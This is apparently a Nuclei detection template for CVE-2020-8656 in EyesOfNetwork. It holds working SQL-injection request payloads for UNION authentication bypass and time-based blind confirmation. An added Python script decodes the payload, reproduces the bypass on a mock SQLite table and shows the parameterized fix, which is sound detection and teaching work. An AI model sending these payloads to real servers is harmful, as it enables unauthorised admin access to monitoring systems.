id: CVE-2020-8656

info:
  name: EyesOfNetwork - Hardcoded API Key & SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
  impact: |
    Unauthenticated attackers can bypass authentication via SQL injection and gain access to the EyesOfNetwork monitoring system and all monitored infrastructure data.
  remediation: |
    Apply security patches or update to the latest version of EyesOfNetwork.
  reference:
    - https://www.exploit-db.com/exploits/48025
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8656
    - https://github.com/EyesOfNetworkCommunity/eonapi/issues/17
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-8656
    epss-score: 0.81824
    epss-percentile: 0.99216
    cwe-id: CWE-798
    cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: eyesofnetwork
    product: eyesofnetwork
    fofa-query: title="EyesOfNetwork"
  tags: cve,cve2020,eyesofnetwork,hardcoded-key,sqli,vuln,vkev

http:
  - raw:
      - |
        GET /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 20s
        GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(6),0,0,0,0,0,0,0%20or%20%27 HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1, "EONAPI_KEY")'
        condition: and

      - type: dsl
        dsl:
          - 'duration_2>=6'
          - 'status_code_2 == 401'
          - 'contains_all(body_2, "api_version", "username-password credentials")'
        condition: and
# digest: 490a0046304402200aeefacfdf07f52717ff693071fffc1cb12fdd0d7d42e120835cd0ef7bb81aa502207cb7f878940a98c179be0637d71b456fa3347de4b7588dbbef5ba51d60cea16d:922c64590222798bb761d5b6d8e72950
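The first request in the template is a UNION-based authentication bypass: the closing quote ends the `user_name` comparison, a `union select` appends an attacker-controlled row whose third column is an MD5 digest, and the trailing `or '` soaks up the query's own closing quote. The `getApiKey` logic then compares `md5(password)` against that injected digest, so the attacker logs in as whichever name the injected row carries. The script below is an added example, not code from the template or from the EyesOfNetwork project: it decodes the template's payload, reproduces the bypass against a hypothetical eight-column SQLite stand-in for the `users` table (the real application uses MySQL, and the column names here are made up), and shows the parameterized query that closes the hole. The eight-column layout is assumed because the payload injects eight values; a UNION with the wrong column count is a syntax error on both engines.

```python
"""Added example: UNION-based auth bypass behind CVE-2020-8656, reproduced
offline on a hypothetical SQLite stand-in. Not code from the Nuclei template
or from EyesOfNetwork; table layout and column names are assumptions."""
import hashlib
import sqlite3
from urllib.parse import unquote

# The username payload from the template's first request, URL-decoded so the
# injected SQL is readable. The embedded hex is the digest the attacker wants
# getApiKey to compare the supplied password against.
TEMPLATE_PAYLOAD = unquote(
    "%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d"
    "%27,0,0,1,1,8%20or%20%27"
)


def md5_hex(password):
    """MD5 hex digest, the (weak) hash the API compares passwords against."""
    return hashlib.md5(password.encode()).hexdigest()


def make_db():
    """Hypothetical users table with eight columns so the UNION lines up
    (assumption: the real EON schema is not reproduced here)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, user_name TEXT, user_passwd TEXT,"
        " col4 INTEGER, col5 INTEGER, col6 INTEGER, col7 INTEGER, col8 INTEGER)"
    )
    # Constructed sample row: a real admin whose password the attacker lacks.
    conn.execute(
        "INSERT INTO users VALUES (1, 'admin', ?, 0, 0, 1, 1, 8)",
        (md5_hex("correct-horse-battery-staple"),),
    )
    conn.commit()
    return conn


def build_payload(password):
    """Build the same injection as the template for any attacker-chosen
    password: the injected row's digest is md5(password), so the later
    password check succeeds by construction."""
    return f"' union select 1,'admin','{md5_hex(password)}',0,0,1,1,8 or '"


def vulnerable_get_api_key(conn, username, password):
    """String-concatenated lookup (the bug class). Returns the user name the
    caller is authenticated as, or None."""
    sql = f"SELECT * FROM users WHERE user_name='{username}'"
    # With the payload the statement becomes:
    #   SELECT * FROM users WHERE user_name='' union select 1,'admin','<md5>',
    #   0,0,1,1,8 or ''
    for row in conn.execute(sql):
        if row[2] == md5_hex(password):
            return row[1]
    return None


def fixed_get_api_key(conn, username, password):
    """Parameterized lookup: the payload is matched as a literal user name and
    never reaches the SQL parser."""
    for row in conn.execute("SELECT * FROM users WHERE user_name=?", (username,)):
        if row[2] == md5_hex(password):
            return row[1]
    return None


if __name__ == "__main__":
    db = make_db()
    print("decoded template payload:", TEMPLATE_PAYLOAD)
    print("vulnerable, attacker password:",
          vulnerable_get_api_key(db, build_payload("h4knet"), "h4knet"))
    print("fixed, same payload:",
          fixed_get_api_key(db, build_payload("h4knet"), "h4knet"))
```

The second template request swaps the first injected column for `sleep(6)`, which is why the matcher keys on `duration_2>=6` together with the 401 that a failed login normally returns: the server still rejects the credentials, but only after MySQL has slept, which is a blind confirmation that the username reaches the query unsanitized even when the UNION bypass is blocked.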